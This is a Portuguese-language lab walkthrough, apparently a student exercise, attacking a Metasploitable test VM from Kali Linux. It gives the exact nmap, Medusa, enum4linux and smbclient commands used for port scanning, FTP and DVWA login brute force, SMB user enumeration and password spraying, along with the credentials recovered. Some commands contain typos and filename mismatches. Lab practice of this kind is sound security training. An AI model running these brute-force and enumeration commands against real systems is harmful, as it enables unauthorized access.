Utilizando nmap para escanear portas abertas no servidor metasploitable

Comando usado no terminal do Kali Linux:

nmap -sV -p 21,22,80,445,139 192.168.243.125

Identificado que as portas 21,22,80,445,139 estão abertas, podendos serem exploradas.

===============================================================================

Realizando ataque de força bruta no serviço FTP utilizando wordlist e Medusa no terminal do Kali Linux

echo -e "user\nmsfadmin\nadmin\nroot" > user.txt

echo -e "12345\npassword\nqwert\nmsfadmin" > pass.txt

medusa -h 192.168.243.125 -U users.txt -P pass.txt -M ftp -t 6

Resultado de credenciais válidas:
User: msfadmin
Pass: msfadmin

Acesso concedido ao ftp no servidor 192.168.243.125

================================================================================
Ataque de força bruta a sistemas web (formulários)

Tentativa de acesso http://192.168.243.125/dvwa/login.php

Criado wordlist para simular ataque no serviço web

echo -e "user\nmsfadmin\nadmin\nroot" > user.txt

echo -e "12345\npassword\nqwert\nmsfadmin" > pass.txt

Utilizado o comando no terminal do Kali Linux

Medusa -h 192.168.243.125 -U user.txt -P pass.txt -M http \
-m PAGE:'/dvwa/login.php' \
-m FORM:'username^USER^&password=^PASS^&Login=Login' \
-m 'FAIL=login failed' -t 6

O acesso obteve êxito utilizando as credenciais abaixo:
User: admin
Pass: password

================================================================================

Ataque em cadeia, enumeração SMB e password spraying

Enumeração de usuários utilizando o Enun4Linux no terminal do Kali Linux

Comando:
enum4linux -a 192.168.243.125 | tee enum4_output.txt

Filtradas as informações para extrair apenas dados necessários

Lista de usernames:

user:[games] rid:[0x3f2]
user:[nobody] rid:[0x1f5]
user:[bind] rid:[0x4ba]
user:[proxy] rid:[0x402]
user:[syslog] rid:[0x4b4]
user:[user] rid:[0xbba]
user:[www-data] rid:[0x42a]
user:[root] rid:[0x3e8]
user:[news] rid:[0x3fa]
user:[postgres] rid:[0x4c0]
user:[bin] rid:[0x3ec]
user:[mail] rid:[0x3f8]
user:[distccd] rid:[0x4c6]
user:[proftpd] rid:[0x4ca]
user:[dhcp] rid:[0x4b2]
user:[daemon] rid:[0x3ea]
user:[sshd] rid:[0x4b8]
user:[man] rid:[0x3f4]
user:[lp] rid:[0x3f6]
user:[mysql] rid:[0x4c2]
user:[gnats] rid:[0x43a]
user:[libuuid] rid:[0x4b0]
user:[backup] rid:[0x42c]
user:[msfadmin] rid:[0xbb8]
user:[telnetd] rid:[0x4c8]
user:[sys] rid:[0x3ee]
user:[klog] rid:[0x4b6]
user:[postfix] rid:[0x4bc]
user:[service] rid:[0xbbc]
user:[list] rid:[0x434]
user:[irc] rid:[0x436]
user:[ftp] rid:[0x4be]
user:[tomcat55] rid:[0x4c4]
user:[sync] rid:[0x3f0]
user:[uucp] rid:[0x3fc]

Criando wordlist de usuários:

echo -e "user\nmsfadmin\nservice" > smb_users.txt

Criando lista de senhas spray:

echo -e "password\n123456\nWelcome123\nmsfadmin" > senhas spray.txt

Realizando o ataque utilizando Medusa no terminal do Kali Linux

medusa -h 192.168.243.125 -U smb_users.txt -P senhas spray.txt -M smbnt -t 2 - T 50

Ataque com sucesso

Credenciais adm para o serviço SMB
User: msfadmin
Pass: msfadmin

smbclient -L //192.168.243.125 -U msfadmin
Acesso bem sucedido 

=====================================================================================